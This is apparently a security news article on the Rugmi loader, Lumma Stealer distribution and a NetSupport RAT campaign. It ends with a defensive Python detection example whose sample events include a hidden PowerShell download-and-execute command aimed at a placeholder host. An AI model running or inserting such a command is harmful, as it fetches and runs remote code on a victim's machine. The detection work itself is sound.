Threat actors are using new malware loaders to deliver information-stealing programs such as Lumma Stealer (aka LummaC2), Vidar, RecordBreaker (aka Raccoon Stealer V2), and Rescoms.
Cybersecurity company ESET is tracking the Trojan under the name Win/TrojanDownloader.Rugmi.
“The malware is a loader with three types of components: a downloader that downloads an encrypted payload, a loader that runs the payload from internal resources, and another loader that runs the payload from an external file on disk,” the company said in its Threat Report for the second half of 2023.
Telemetry data collected by the company shows that detections of Rugmi loaders surged in October and November 2023, from single digits per day to hundreds per day.
Stealer malware is often sold on a subscription basis to other threat actors in a Malware-as-a-Service (MaaS) model. For example, Lumma Stealer is advertised on underground forums for $250 per month. The most expensive plan costs $20,000, but it also gives customers access to the source code and the right to sell it.
There is evidence that code libraries associated with the Mars, Arkei, and Vidar stealers were reused to build Lumma.
In addition to constantly adapting its tactics to evade detection, this off-the-shelf tool is distributed through a variety of methods, from malvertising to fake browser updates to cracked installations of popular software such as VLC media player and OpenAI ChatGPT.
Another technique involves using Discord’s Content Delivery Network (CDN) to host and spread malware, as revealed by Trend Micro in October 2023.
This involves using a combination of random and compromised Discord accounts to send direct messages to potential targets, offering them $10 or a Discord Nitro subscription in exchange for their help with a project.
Users who agreed to the proposal were then urged to download an executable file hosted on Discord’s CDN that posed as iMagic Inventory but actually contained the Lumma Stealer payload.
“Off-the-shelf malware solutions contribute to the proliferation of malicious activity as they make malware available to even less technical threat actors,” ESET said.
“Offering a wider range of features can make Lumma Stealer more attractive as a product.”
The disclosure comes as McAfee Labs revealed a new variant of the NetSupport RAT, derived from its legitimate predecessor NetSupport Manager, which has since been used by initial access brokers to gather information and perform additional actions on victims of interest.
“The infection starts with an obfuscated JavaScript file that serves as the initial entry point for the malware,” McAfee said, adding that this highlights “the evolving strategies used by cybercriminals.”
Execution of the JavaScript file advances the attack chain by running PowerShell commands that retrieve the remote-control and stealer malware from an attacker-controlled server. Key targets of the campaign include the United States and Canada.
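The chain described above (a Windows script host launching PowerShell that fetches or decodes a payload) is something defenders can flag in process-creation telemetry. The following is an added example, not code from the article, ESET or McAfee; the events, paths and the `example.invalid` URL are constructed, and the field names assume a Sysmon-style parent/image/command-line record.

```python
import re

# Constructed process-creation events (hypothetical, not from any real telemetry).
# Fields mirror what a Sysmon Event ID 1 or EDR record carries.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -ep bypass -c "
                "\"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},   # benign admin script
    {"parent": r"C:\Windows\System32\cscript.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c echo hello"},                              # script host, but no PowerShell
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -enc SQBFAFgA"},                      # encoded command (constructed)
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line fragments suggesting the PowerShell stage fetches or decodes a remote payload.
PAYLOAD_PATTERNS = {
    "uses a download primitive":
        re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer", re.I),
    "carries an encoded command":
        re.compile(r"\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", re.I),
}

def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(event):
    """Return the reasons an event matches the script-host -> PowerShell -> payload chain (empty if none)."""
    reasons = []
    if basename(event["parent"]) in SCRIPT_HOSTS and basename(event["image"]) in POWERSHELL:
        reasons.append("PowerShell spawned by a Windows script host")
        for name, pattern in PAYLOAD_PATTERNS.items():
            if pattern.search(event["cmdline"]):
                reasons.append("command line " + name)
    return reasons

def find_suspicious(events):
    """Indices of matching events paired with their reasons, for triage."""
    return [(i, classify(e)) for i, e in enumerate(events) if classify(e)]
```

Only the two wscript-spawned PowerShell events match; the explorer-launched script and the cscript-to-cmd event are left alone, which keeps the rule narrow enough to be useful on a busy fleet.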